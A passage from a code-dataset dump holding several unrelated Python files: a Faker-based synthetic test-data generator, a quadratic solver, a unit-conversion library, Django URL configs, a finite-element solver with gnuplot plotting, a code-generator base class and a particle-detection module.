随机IP4地址\n # \"地理信息伪数据\"\n 'City': 'VARCHAR(500)', # 城市\n 'Country': 'VARCHAR(500)', # 国家\n 'Country Code': 'VARCHAR(50)', # 国家编码\n # 'Area'district: 'VARCHAR(100)', # 仅支持中国\n 'Latitude': 'VARCHAR(150)', # 地理坐标:纬度\n 'Longitude': 'VARCHAR(150)', # 地理坐标:经度\n 'Postcode': 'VARCHAR(150)', # 邮编\n # 'Province'province: 'VARCHAR(100)', # 台湾,美国没有\n 'Address': 'VARCHAR(500)', # 详细地址\n 'Street Address': 'VARCHAR(500)', # 街道地址\n 'Street Name': 'VARCHAR(200)', # 街道名\n 'Street Suffix': 'VARCHAR(200)', # 街、路\n 'Building NO.': 'VARCHAR(200)', # 楼牌号 eg:'B座'\n\n # \"基础信息伪数据\"\n 'SSN': 'VARCHAR(100)', # SSN号\n 'Service Business': 'VARCHAR(500)', # 随机公司服务行业\n 'Company Name': 'VARCHAR(500)', # 随机公司名\n 'Card Info': 'VARCHAR(500)', # 生成完整信用卡信息\n 'Card NO.': 'VARCHAR(150)', # 生成信用卡号\n 'Card Type': 'VARCHAR(100)', # 信用卡类型\n 'Card Security Code': 'VARCHAR(100)', # 信用卡安全码\n 'Job': 'VARCHAR(200)', # 职位\n\n\n 'First Name(Female)': 'VARCHAR(50)', # 女性 名\n 'First Name(Male)': 'VARCHAR(50)', # 男性 名\n 'Last Name(Female)': 'VARCHAR(50)', # 女性\n 'Last Name(Male)': 'VARCHAR(50)', # 男性\n 'Full Name': 'VARCHAR(100)', # 随机生成全名\n 'Male Name': 'VARCHAR(100)', # 男性全名\n 'Female Name': 'VARCHAR(100)', # 女性全名\n 'ISDN NO.': 'VARCHAR(100)', # 移动台国际用户识别码,即移动用户的ISDN号码\n 'Phone NO.': 'VARCHAR(100)', # 随机生成电话号\n 'NO. Segment(Phone)': 'VARCHAR(100)', # 随机生成手机号段如'139'\n\n # \"网络基础信息伪数据\"\n 'Domain Name': 'VARCHAR(200)', # 生成域名\n\n 'IP Address V6': 'VARCHAR(100)', # 随机IP6地址\n 'MAC Address': 'VARCHAR(100)', # 随机MAC地址\n 'URI Address': 'VARCHAR(500)', # 随机URI地址\n 'URL Address': 'VARCHAR(500)', # 随机URL地址\n 'User Name': 'VARCHAR(100)', # 随机用户名\n\n # \"浏览器信息伪数据\"\n 'User Agent': 'VARCHAR(500)', # 随机user_agent信息\n\n # \"文件信息伪数据\"\n 'File Type': 'VARCHAR(50)', # 随机文件扩展名如'avi','txt'\n 'File Name': 'VARCHAR(100)', # 随机文件名(包含扩展名,不包含路径)\n 'File Path': 'VARCHAR(200)', # 随机文件路径(包含文件名,扩展名)\n 'Mime Type': 'VARCHAR(100)', # 随机mime Type\n}\n\n\n\n'''调用生成数据方法'''\ndef data_generator(field, fake_obj):\n if field == 'Id NO.':\n return fake_obj.random_int()\n if field == 'First Name':\n return fake_obj.first_name()\n if field == 'Last Name':\n return fake_obj.last_name()\n if field == 'Email Address':\n return fake_obj.email()\n if field == 'Gender':\n return random.choice(['Female', 'Male', 'Non-binary'])\n if field == 'IP Address V4':\n return fake_obj.ipv4()\n\n if field == 'City':\n return fake_obj.city(), # 城市\n if field == 'Country':\n return fake_obj.country(), # 国家\n if field == 'Country Code':\n return fake_obj.country_code(), # 国家编码\n # 'Area': fake_obj.district(), # 仅支持中国\n if field == 'Latitude':\n return fake_obj.latitude(), # 地理坐标:纬度\n if field == 'Longitude':\n return fake_obj.longitude(), # 地理坐标:经度\n if field == 'Postcode':\n return fake_obj.postcode(), # 邮编\n # 'Province': return fake_obj.province(), # 台湾,美国没有\n if field == 'Address':\n return fake_obj.address(), # 详细地址\n if field == 'Street Address':\n return fake_obj.street_address(), # 街道地址\n if field == 'Street Name':\n return fake_obj.street_name(), # 街道名\n if field == 'Street Suffix':\n return fake_obj.street_suffix(), # 街、路\n if field == 'Building NO.':\n return fake_obj.building_number(), # 楼牌号 eg:'B座'\n\n # \"基础信息伪数据\"\n if field == 'SSN':\n return fake_obj.ssn(), # SSN号\n if field == 'Service Business':\n return fake_obj.bs(), # 随机公司服务行业\n if field == 'Company Name':\n return fake_obj.company(), # 随机公司名\n if field == 'Card Info':\n return fake_obj.credit_card_full(), # 生成完整信用卡信息\n if field == 'Card NO.':\n return fake_obj.credit_card_number(card_type=None), # 生成信用卡号\n if field == 'Card 
Type':\n return fake_obj.credit_card_provider(), # 信用卡类型\n if field == 'Card Security Code':\n return fake_obj.credit_card_security_code(), # 信用卡安全码\n if field == 'Job':\n return fake_obj.job(), # 职位\n\n if field == 'First Name(Female)':\n return fake_obj.first_name_female(), # 女性 名\n if field == 'First Name(Male)':\n return fake_obj.first_name_male(), # 男性 名\n if field == 'Last Name(Female)':\n return fake_obj.last_name_female(), # 女性\n if field == 'Last Name(Male)':\n return fake_obj.last_name_male(), # 男性\n if field == 'Full Name':\n return fake_obj.name(), # 随机生成全名\n if field == 'Male Name':\n return fake_obj.name_male(), # 男性全名\n if field == 'Female Name':\n return fake_obj.name_female(), # 女性全名\n if field == 'ISDN NO.':\n return fake_obj.msisdn(), # 移动台国际用户识别码,即移动用户的ISDN号码\n if field == 'Phone NO.':\n return fake_obj.phone_number(), # 随机生成电话号\n if field == 'NO. Segment(Phone)':\n return fake_obj.phonenumber_prefix(), # 随机生成手机号段如'139'\n\n # \"网络基础信息伪数据\"\n if field == 'Domain Name':\n return fake_obj.domain_name(), # 生成域名\n\n if field == 'IP Address V6':\n return fake_obj.ipv6(), # 随机IP6地址\n if field == 'MAC Address':\n return fake_obj.mac_address(), # 随机MAC地址\n if field == 'URI Address':\n return fake_obj.uri(), # 随机URI地址\n if field == 'URL Address':\n return fake_obj.url(), # 随机URL地址\n if field == 'User Name':\n return fake_obj.user_name(), # 随机用户名\n\n # \"浏览器信息伪数据\"\n if field == 'User Agent':\n return fake_obj.user_agent(), # 随机user_agent信息\n\n # \"文件信息伪数据\"\n if field == 'File Type':\n return fake_obj.file_extension(), # 随机文件扩展名如'avi','txt'\n if field == 'File Name':\n return fake_obj.file_name(), # 随机文件名(包含扩展名,不包含路径)\n if field == 'File Path':\n return fake_obj.file_path(), # 随机文件路径(包含文件名,扩展名)\n if field == 'Mime Type':\n return fake_obj.mime_type(), # 随机mime Type\n\n#\n# if __name__ == '__main__':\n# from faker.config import *\n# from faker import Factory\n# fa = Factory.create(locale='zh_CN')\n# a = fa.file_path()\n# print(a)\n# print(AVAILABLE_LOCALES)\n\n\n","sub_path":"fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"207156402","text":"'''\nQuadratic Formula Calculator\nBy: Owen Jennings\n\n'''\n\nimport math\n\n# input values\na = float(input(\"\\n\\n\\na term: \"))\nb = float(input(\"b term: \"))\nc = float(input(\"c term: \"))\n\n\ndiscriminate = b**2 - 4*(a)*(c)\nif discriminate < 0:\n print(\"\\n\\n\\nNo Solutions!\")\nelif discriminate == 0:\n print(\"\\n\\nOnly One Solution!\")\n ans = (-(b) + (math.sqrt(discriminate))) / (2 * a)\n print(\"Solution: \" + str(ans))\nelse:\n ans = (-(b) + (math.sqrt(discriminate))) / (2 * a)\n ans2 = (-(b) - (math.sqrt(discriminate))) / (2 * a)\n print(\"\\nEquation: \" + str(-1 * b) + \" +/- √(\" + str(discriminate) + \") / \" + str(2 / a))\n print(\"Discriminate: \" + str(discriminate))\n print(\"\\n\\nAnswer rounded to the fourth digit: \")\n print(\"Solution 1: \" + str(round(ans, 4)) + \"\\nSolution 2: \" + str(round(ans2, 4)))\n\n# check if the square root is a float or integer and decide whether to display whole number or square root equation\n\n","sub_path":"quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"158966266","text":"__author__ = \"Luis Domingues\"\r\n__maintainer__ = \"Luis Domingues\"\r\n__email__ = \"luis.hmd@gmail.com\"\r\n\r\ndef init():\r\n\r\n # Ref 
unit is 1 bar\r\n dic_pressure = {\"pascal\":1e-5,\r\n \"kilopascal\":1e-2,\r\n \"megapascal\":10.0,\r\n \"centipascal\":1e-7,\r\n \"milipascal\":1e-8,\r\n \"atmosphere\":1.01325,\r\n \"cm H2O @4 degC\": 0.000980665,\r\n \"centitorr\":0.000013332237,\r\n \"mm Hg @0 degC\":0.0013332239,\r\n \"in Hg 32 degF\":0.0338638,\r\n \"cm H2O @ 4 degC\":0.000980638,\r\n \"mm H2O @ 4 degC\":0.0000980638,\r\n \"m H2O @ 4 degC\":0.0980638,\r\n \"bar\":1.0,\r\n \"milibar\":1e-3,\r\n \"dyne/cm2\":1e-6,\r\n \"kilogram-force/m2\":0.000098066,\r\n \"psi\":0.068947573,\r\n \"torr\":0.0013332239}\r\n\r\n # Ref unit is 0 degC\r\n # unit_to = f[0] + f[1]*unit_from\r\n dic_temperature_to_celsius = {\"Kelvin\":[-273.15, 1],\r\n \"Fahrenheit\":[-32*5.0/9.0, 5.0/9.0],\r\n \"Rankine\":[-491.67*5.0/9.0, 5.0/9.0],\r\n \"Celsius\":[0, 1]}\r\n dic_temperature_from_celsius = {\"Kelvin\":[273.15, 1],\r\n \"Fahrenheit\":[32, 9.0/5.0],\r\n \"Rankine\":[273.15*9.0/5.0, 9.0/5.0],\r\n \"Celsius\":[0, 1]}\r\n\r\n # Ref unit is 1 m\r\n dic_length = {\"picometre\":1e-12,\r\n \"angstrom\":1e-10,\r\n \"nanometre\":1e-9,\r\n \"micrometre\":1e-6,\r\n \"milimetre\":1e-3,\r\n \"centimetre\":1e-2,\r\n \"metre\":1.0,\r\n \"decametre\":10,\r\n \"hectometre\":100,\r\n \"kilometre\":1000,\r\n \"yard\":0.9144,\r\n \"mile\":1609.35,\r\n \"foot\":0.3048,\r\n \"inch\":2.54e-2,\r\n \"lightyear\":9460660000000000}\r\n\r\n # Ref unit is 1 kg\r\n dic_weight = {\"kilogram\":1,\r\n \"gram\":1e-3,\r\n \"miligram\":1e-6,\r\n \"metric ton\":1000,\r\n \"pound\":0.453592,\r\n \"ounce\":0.0283495,\r\n \"carrat\":0.0002,\r\n \"atomic mass unit\":1.660540199e-27}\r\n\r\n # Ref unit is 1 second\r\n dic_time = {\"month\":30.5*24*3600,\r\n \"day\":24*3600,\r\n \"hour\":3600,\r\n \"minute\":60,\r\n \"second\":1}\r\n\r\n dic_units_conversion = {\"pressure\":dic_pressure,\r\n \"temperature\":[dic_temperature_to_celsius, dic_temperature_from_celsius],\r\n \"length\":dic_length,\r\n \"weight\":dic_weight,\r\n \"time\": dic_time,\r\n \"speed\":[dic_length, dic_time],\r\n \"pace\": [dic_time, dic_length]}\r\n\r\n return dic_units_conversion\r\n\r\n\r\ndef get_default_units():\r\n defaults_dic = {\"pressure\":\"bar\",\r\n \"temperature\":\"Celsius\",\r\n \"length\":\"centimetre\",\r\n \"weight\":\"kilogram\",\r\n \"time\":\"second\"}\r\n return defaults_dic\r\n\r\n\r\ndef conv_temperature(N_from, unit_from, unit_to, dic_list):\r\n \"\"\"\r\n For temperature conversions\r\n \"\"\"\r\n dic_t_to_celsius = dic_list[0]\r\n dic_celsius_to_t = dic_list[1]\r\n temp_celsius = dic_t_to_celsius[unit_from][0] + dic_t_to_celsius[unit_from][1]*N_from\r\n N_to = dic_celsius_to_t[unit_to][0] + dic_celsius_to_t[unit_to][1]*temp_celsius\r\n return N_to\r\n\r\n\r\ndef conv_simple(N_from, unit_from, unit_to, dic):\r\n \"\"\"\r\n For simple conversions\r\n \"\"\"\r\n f_from = dic[unit_from]\r\n f_to = dic[unit_to]\r\n N_to = float(N_from) * f_from / f_to\r\n return N_to\r\n\r\n\r\ndef conv_composite(N_from, unit_from, unit_to, dic_list):\r\n \"\"\"\r\n For units of the type m/s\r\n \"\"\"\r\n [unit_from_num, unit_from_den] = unit_from.split(\"/\")\r\n [unit_to_num, unit_to_den] = unit_to.split(\"/\")\r\n N_to_num = conv_simple(1, unit_from_num, unit_to_num, dic_list[0])\r\n N_to_den = conv_simple(1, unit_from_den, unit_to_den, dic_list[1])\r\n N_to = float(N_from) * N_to_num / N_to_den\r\n return N_to\r\n\r\n\r\ndef conv(N_from, unit_type, unit_from, unit_to, dic):\r\n \"\"\"\r\n Main function to be used. 
Should use all other functions\r\n \"\"\"\r\n if unit_type == \"temperature\":\r\n N_to = conv_temperature(N_from, unit_from, unit_to, dic[\"temperature\"])\r\n else:\r\n if unit_type == \"speed\":\r\n N_to = conv_composite(N_from, unit_from, unit_to, dic[\"speed\"])\r\n else:\r\n if unit_type == \"pace\":\r\n N_to = conv_composite(N_from, unit_from, unit_to, dic[\"pace\"])\r\n else:\r\n N_to = conv_simple(N_from, unit_from, unit_to, dic[unit_type])\r\n return N_to\r\n\r\n\r\ndef get_options(dic):\r\n options = dic.keys()\r\n return options\r\n\r\n\r\nif __name__ == \"__main__\":\r\n# Testing\r\n dic_main = init()\r\n N = conv(100,\"length\", \"milimetre\",\"milimetre\",dic_main)\r\n print(N)\r\n\r\n speed = 4.2530\r\n\r\n dic_main = init()\r\n N = conv(speed, \"speed\", \"metre/second\", \"kilometre/hour\", dic_main)\r\n print(N)\r\n\r\n dic_main = init()\r\n N = conv(1/speed, \"pace\", \"second/metre\", \"minute/kilometre\", dic_main)\r\n print(N)","sub_path":"libraries/conversion_lib.py","file_name":"conversion_lib.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95288699","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns(\n '', # Empty string as prefix\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^profiles/', include('apps.profiles.urls')),\n\n url(r'^accounts/', include('allauth.urls')),\n\n url(r'^$', include('apps.core.urls')),\n)\n","sub_path":"horas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572753892","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path(\"\", include(\"school.urls\")),\n path(\"students/\", include(\"students.urls\")),\n path(\"staff/\", include(\"staff.urls\")),\n path(\"auth/\", include(\"accounts.urls\")),\n path(\"pdf/\", include(\"pdf_engine.urls\")),\n path(\"ajax/\", include(\"ajax.urls\")),\n path(\"sms/\", include(\"sms.urls\")),\n path('admin/', admin.site.urls),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n","sub_path":"curie/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"563299829","text":"#\n# ps7pr3.py (Problem Set 7, Problem 3)\n#\n# More image processing!\n#\n# Computer Science 111\n#\n# name:\n# email:\n# \n# This problem is an individual-only problem that you should complete\n# on your own.\n#\n\n# IMPORTANT: This file is for your solutions to problem 3.\n# Your solutions to problem 2 should go in ps7pr2.py instead.\n\nfrom cs111png import *\n\ndef brightness(pixel):\n \"\"\" takes a pixel (an [R, G, B] list) and returns a value\n between 0 and 255 that represents the brightness of that pixel.\n \"\"\"\n red = pixel[0]\n green = pixel[1]\n blue = pixel[2]\n return (21*red + 72*green + 7*blue) // 100\n \n### PUT YOUR WORK FOR PROBLEM 3 BELOW. 
###\n","sub_path":"ps7image/ps7pr3.py","file_name":"ps7pr3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409253058","text":"import sys, os\nimport pyfem1d.pyfem1d_cmd as cmd_\nimport numpy as np\nimport collections\nfrom pyfem1d.umat import *\nfrom pyfem1d.load import *\nfrom numpy import zeros, dtype, float64\nfrom subprocess import call\n\n\nclass Analysis:\n def __init__(self):\n self.cmdShell = cmd_.Pyfem1dShell(self)\n\n self.input_file = None\n self.output_file = None\n self.logFile = None\n self.stress_file = None\n self.displacement_file = None\n self.plot_file = None\n self.interactive = False\n # self.gui = False\n self.o_node = None\n self.o_elem = None\n\n self.umat_dict = {}\n self.load_dict = {}\n\n self.current_umat_key = None\n self.current_load_key = None\n\n self.umat = None\n self.load = None\n\n self.bctype = None\n self.abspath = os.path.dirname(os.path.abspath(__file__))\n self.workingDirectory = None\n\n self.number_of_elements = None\n self.timestep = None\n self.maximum_time = None\n\n def header(self):\n header = \"\"\n\n header += format_if_not_none(\" Input file : \", self.input_file)\n header += format_if_not_none(\" Output file : \", self.output_file)\n header += format_if_not_none(\" Stress file : \", self.stress_file)\n header += format_if_not_none(\" Disp. file : \",\n self.displacement_file)\n\n header += format_if_not_none(\" Number of Elements nelem = \",\n self.number_of_elements)\n header += format_if_not_none(\" Time step size dt = \",\n self.timestep)\n header += format_if_not_none(\" Duration tmax = \",\n self.maximum_time)\n header += format_if_not_none(\" Boundary Condition bctype = \",\n self.bctype)\n\n header += format_if_not_none(\" Umat : \", self.umat)\n header += format_if_not_none(\" Load : \", self.load)\n\n return header\n\n def printHeader(self):\n \"\"\"Prints program header with version\"\"\"\n print(\"pyfem1d - 1d finite elements for testing material formulations\")\n #print(self.header())\n\n def add_umats(self, path):\n self.umat_dict.update(deploy_umats(path))\n\n def add_loads(self, path):\n self.load_dict.update(deploy_loads(path))\n\n def set_umat(self, key):\n self.umat = self.umat_dict[key]\n self.current_umat_key = key\n\n def set_umat_parameters(self, parameters):\n self.umat.parameter_values = parameters\n self.umat_dict[self.current_umat_key].parameter_values = parameters\n\n def set_load(self, key):\n self.load = self.load_dict[key]\n self.current_load_key = key\n\n def set_load_parameters(self, parameters):\n self.load.parameter_values = parameters\n self.load_dict[self.current_load_key].parameter_values = parameters\n\n def plotToWindow(self, stress_file=None):\n if not stress_file:\n stress_file = self.stress_file\n commands = \"\"\n commands += \"set terminal X11 size 1300 400;\"\n commands += \"set key rmargin;\"\n commands += \"set multiplot;\"\n commands += \"set lmargin at screen 0.025;\"\n commands += \"set rmargin at screen 0.325;\"\n commands += \"set xlabel \\\"Time\\\";\"\n commands += \"set ylabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 1:2 w l;\" % stress_file\n commands += \"set lmargin at screen 0.35;\"\n commands += \"set rmargin at screen 0.65;\"\n commands += \"set ylabel \\\"Stress\\\";\"\n commands += \"plot \\\"%s\\\" u 1:3 w l;\" % stress_file\n commands += \"set lmargin at screen 0.675;\"\n commands += \"set rmargin at screen 0.975;\"\n commands += \"set xlabel \\\"Strain\\\";\"\n 
commands += \"plot \\\"%s\\\" u 2:3 w l;\" % stress_file\n commands += \"unset multiplot;\"\n\n call([\"gnuplot\", \"-p\", \"-e\", commands])\n\n#set output \"| ps2pdf -dCompatibilityLevel=1.4 -dPDFSETTINGS=/prepress - \"+self.ofilebase+\"_plot.pdf;\\\n\n def plotPdf(self, stress_file, plot_file):\n # if not stress_file:\n # stress_file = self.stress_file\n\n # if not plot_file:\n # plot_file = self.plot_file\n\n print(\"Plotting to file %s\" % plot_file)\n\n commands = \"\"\n commands += \"set term pdf enhanced font \\\"Helvetica,10\\\";\"\n commands += \"set output \\\"%s\\\";\" % plot_file\n commands += \"set lmargin;\"\n commands += \"set rmargin;\"\n commands += \"set grid;\"\n commands += \"unset key;\"\n commands += \"set xlabel \\\"Time\\\";\"\n commands += \"set ylabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 1:2 w l lt 1;\" % stress_file\n commands += \"set ylabel \\\"Stress\\\";\"\n commands += \"plot \\\"%s\\\" u 1:3 w l lt 1;\" % stress_file\n commands += \"set xlabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 2:3 w l lt 1;\" % stress_file\n\n call([\"gnuplot\", \"-p\", \"-e\", commands])\n\n def startShell(self):\n self.cmdShell.cmdloop()\n\n def setRuntimeParameters(self):\n self.o_node = self.number_of_elements + 1 #node to be written to the output\n self.o_elem = self.number_of_elements #element to be written to the output\n self.number_of_elements = self.number_of_elements\n self.neq = self.number_of_elements + 1\n self.nnode = self.number_of_elements + 1\n self.t = 0\n\n if isinstance(self.bctype, collections.Iterable):\n self.bctype = 0\n\n def solve(self):\n '''Solution function'''\n\n if not self.umat:\n raise Exception(\"No umat function specified\")\n\n if not self.load:\n raise Exception(\"No load function specified\")\n\n if not self.maximum_time:\n raise Exception(\"No end time specified\")\n\n if not self.number_of_elements:\n raise Exception(\"No number of elements specified\")\n\n if not self.timestep:\n raise Exception(\"No timestep specified\")\n\n self.setRuntimeParameters()\n output = open(self.output_file, 'w')\n\n #self.update()\n\n print(self.header())\n output.write(self.header())\n #self.printheader(ofile=output)\n\n neq = self.number_of_elements + 1\n #Initialize the system matrices\n self.init_system()\n #Set time to zero\n self.t = 0.\n #Generate nodes & initialize solution vector\n dl = 1 / self.number_of_elements\n u = zeros((self.neq, 1))\n x = zeros((self.nnode, 1))\n #u= zeroflt(self.neq,1)\n #x= zeroflt(self.nnode,1)\n for i in range(int(self.nnode)):\n x[i] = (i - 1) * dl\n\n # open files for output at the selected node and element\n outd = open(self.displacement_file, 'w')\n outs = open(self.stress_file, 'w')\n\n # Simulation loop\n\n self.umat.initial_cond(self.number_of_elements)\n # if self.umat.initcond():\n # self.umat.initcond()(self.number_of_elements)\n\n while self.t <= self.maximum_time + self.timestep:\n\n load = self.load.value(self.t)\n if self.verbose:\n print(' Compute solution at t= %6.4f, load= %6.4f' %\n (self.t, load))\n\n # Newton iterations\n res = 1\n niter = 0\n nitermax = 50\n while res > 1.e-10 and niter < nitermax:\n #Calculate the residual vector and stiffness matrix\n #and update the history variables\n self.comp_stiffness(u)\n #impose boundary conditions\n if self.bctype == 0:\n self.kg[:][0] = 0.\n self.kg[0][:] = 0.\n self.kg[0][0] = 1.\n self.fg[-1] -= load\n self.fg[0] = 0.\n elif self.bctype == 2:\n du = load - u[-1]\n for i in range(int(neq)):\n self.fg[i] -= self.kg[i][-1] * du\n 
self.kg[:][0] = 0.\n self.kg[0][:] = 0.\n self.kg[-1][:] = 0\n self.kg[:][-1] = 0\n self.kg[0][0] = 1.\n self.kg[-1][neq - 1] = 1.\n self.fg[0] = 0.\n self.fg[-1] = -1 * du\n elif self.bctype == 1:\n self.kg[:][0] = 0.\n self.kg[0][:] = 0.\n self.kg[0][0] = 1.\n self.fg[1:-1] -= load * dl\n self.fg[-1] = self.fg[-1] - load * dl / 2\n self.fg[0] = 0\n else:\n raise Exception('Error: Undefined bc type identifier: ' +\n self.bctype)\n #calculate the residual\n res = np.linalg.norm(self.fg, 2)\n if self.verbose:\n print(' >> iter %2i, res = %10.5e' % (niter, res))\n #solve the system\n kginv = np.linalg.inv(self.kg)\n dg = np.dot(kginv, self.fg)\n #update nodal displacements\n u -= dg\n niter += 1\n # Print results\n #if self.verbose:\n output.write('\\n Solution at t=%6.4f, load= %6.4f\\n' %\n (self.t, load))\n output.write(' Nodal solutions\\n')\n output.write(' Node x-coord. u\\n')\n for i in range(int(neq)):\n output.write(' %4i %6.4e %6.4e\\n' % (i, x[i], u[i]))\n output.write('\\n Element solutions\\n')\n output.write(' Element Strain Stress\\n')\n for i in range(int(self.number_of_elements)):\n output.write(' %4i %6.4e %6.4e\\n' %\n (i, self.eps[i], self.sig[i]))\n outd.write(' %6.4e %6.4e\\n' % (self.t, u[self.o_node - 1]))\n outs.write(' %6.4e %6.4e %6.4e\\n' %\n (self.t, self.eps[self.o_elem - 1],\n self.sig[self.o_elem - 1]))\n\n # Update History\n # if self.umat.update():\n # self.umat.update()()\n self.umat.update()\n\n self.t += self.timestep\n\n print('Finished solution')\n outd.close()\n outs.close()\n output.close()\n\n def init_system(self):\n self.fg = zeros((self.neq, 1))\n self.kg = zeros((self.neq, self.neq))\n self.eps = zeros((self.number_of_elements, 1))\n self.sig = zeros((self.number_of_elements, 1))\n self.aa = zeros((self.number_of_elements, 1))\n #self.fg=zeroflt(self.neq,1)\n #self.kg=zeroflt(self.neq,self.neq)\n #self.eps=zeroflt(self.number_of_elements,1)\n #self.sig=zeroflt(self.number_of_elements,1)\n #self.aa=zeroflt(self.number_of_elements,1)\n self.dl = 1 / float(self.number_of_elements)\n\n def comp_stiffness(self, u):\n '''Compute stiffness matrix and residual vector,\n and update history variables'''\n offs = 0\n self.fg[:] = 0.\n self.kg[:][:] = 0.\n dN = zeros((2, 1))\n #dN=zeroflt(2,1)\n # Assembly: loop over elements\n for n in range(int(self.number_of_elements)):\n dN[0] = -1 / self.dl\n dN[1] = -1 * dN[0]\n #compute element strain\n epsl = (u[n + 1] - u[n]) / self.dl\n # Calculate the stress, modulus and update history at the Gauss point\n\n sigl, aal = self.umat.stress_tangent(self.timestep, n, epsl)\n\n #store the stresses and moduli\n self.eps[n] = epsl\n self.sig[n] = sigl\n self.aa[n] = aal\n #loop over element dofs: element stiffness and internal force vector\n #fe = zeroflt(2,1)\n #ke = zeroflt(2,2)\n fe = zeros((2, 1))\n ke = zeros((2, 2))\n for i in range(2):\n fe[i] += dN[i] * sigl * self.dl\n #\\int B^{T}\\sigma dV\n for j in range(2):\n ke[i][j] += dN[i] * aal * dN[\n j] * self.dl #\\int B^{T} E B dV\n\n #assemble global matrices\n for i in range(2):\n self.fg[i + offs] += fe[i]\n for j in range(2):\n self.kg[i + offs][j + offs] += ke[i][j]\n offs += 1\n\n\ndef format_if_not_none(prefix, var):\n return prefix + (str(var) if var else \"None\") + \"\\n\"\n","sub_path":"pyfem1d/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":12575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"280083198","text":"#!/usr/bin/env python\n\nfrom util import verifyName, 
hasDupes\n\nimport cog\n\n# 'object' is a C class so python doesn't let us set arbitrary\n# attributes on it. We subclass it so we can just smack whatever\n# we want on there.\nclass _object(object): pass\n\nclass GeneratorBase(object):\n def __init__(self, name, fields, config={}):\n self.config = config\n\n self.name = name\n self.fields = []\n self.possible_tags = set()\n\n self.schema = fields[0]\n assert type(fields[0]) == list\n\n for column in self.schema:\n assert type(column) == str\n\n for row in fields[1:]:\n field = _object()\n for field_name, value in zip(self.schema, row):\n verifyName(field_name)\n setattr(field, field_name, value)\n self.fields.append(field)\n\n fieldNames = [f.name for f in self.fields]\n maybeDupe = hasDupes(fieldNames)\n if maybeDupe:\n cog.error(\"You can't specify the same field name twice. \"\n \"Name specified twice: \" + maybeDupe)\n\n for f in self.fields:\n if hasattr(f, \"tags\") and f.tags != None:\n if type(f.tags) == list:\n maybeDupe = hasDupes(f.tags)\n if maybeDupe:\n cog.error(\"You can't specify the same tag twice \"\n \" on the same field. \"\n \"Tag specified twice: \" + maybeDupe +\n \" on field: \" + f.name)\n self.possible_tags.update(f.tags)\n elif type(f.tags) == set:\n self.possible_tags.update(f.tags)\n else:\n self.possible_tags.add(f.tags)\n f.tags = [f.tags]\n else:\n f.tags = []\n\n for t in f.tags:\n verifyName(t)\n\n if not hasattr(f, \"metadata\") or f.metadata == None:\n f.metadata = []\n elif type(f.metadata) == list:\n metaNames = [m.name for m in f.metadata]\n maybeDupe = hasDupes(metaNames)\n if maybeDupe:\n cog.error(\"You can't specify metadata with the same \"\n \"name twice. Name specified twice: \" +\n maybeDupe + \" on field: \" + f.name)\n else:\n f.metadata = [f.metadata]\n\n if not hasattr(f, \"value\"):\n f.value = None\n\n if not hasattr(f, \"type\"):\n f.type = None\n\n self.generate()\n\n def generate(self):\n pass\n\n","sub_path":"cog-recipes/cogflect/GeneratorBase.py","file_name":"GeneratorBase.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124857825","text":"\"\"\"\nRoutines for detection\nEmily Dunkel\n2018\n\"\"\"\nimport os\nimport sys\nfrom helm.tracker.detectors import helm_orig as helm_original_detector\nimport helm.tracker.postprocessors.postprocessor_factory as tracking_utils\nimport helm.tracker.file_handler as file_utils\nimport helm.tracker.trackers.dbscan as db_utils\n\n# current directory file is in\nfile_path = os.path.dirname(os.path.realpath(__file__))\n\n\ndef detect_init(detect_algs, config):\n \"\"\"\n Check inputs for detection methods\n\n Detection method does not exist\n >>> detect_init('test', {})\n Traceback (most recent call last):\n ValueError:...\n \"\"\"\n\n for detect_type in detect_algs:\n if detect_type == 'helm_orig':\n file_utils.check_inputs(config['helm_orig'], ['threshold', 'epsilon_px', 'min_weight', 'min_px', 'noise_px', 'max_uncert_px'])\n elif detect_type == 'dbscan':\n pass\n else:\n raise ValueError('Detection method not in list. 
Possible methods include helm_orig')\n return None\n\n\ndef detect(img_diff, detect_algs, config, debug=False):\n \"\"\"\n Returns a dictionary of particles\n Inputs: img_diff = difference image\n particles = detections dictionary (from prior frames)\n detect_algs = detection algs to use (is a list)\n config = detection configurations\n is_first_call = True if is the first time calling\n ii = frame number\n \"\"\"\n \n # loop over user selected detection methods\n for detect_type in detect_algs:\n\n # Gary's original detection method\n if detect_type == 'helm_orig':\n particles = helm_original_detector.get_particles(img_diff, config['helm_orig'], debug)\n\n elif detect_type == 'dbscan':\n particles = db_utils.add_frame(img_diff)\n\n # undefined detection method\n else:\n print('detection method not in list: ', detect_type)\n sys.exit(0)\n\n # put code here to combine more than one detection method\n \n return particles\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(optionflags=doctest.ELLIPSIS | 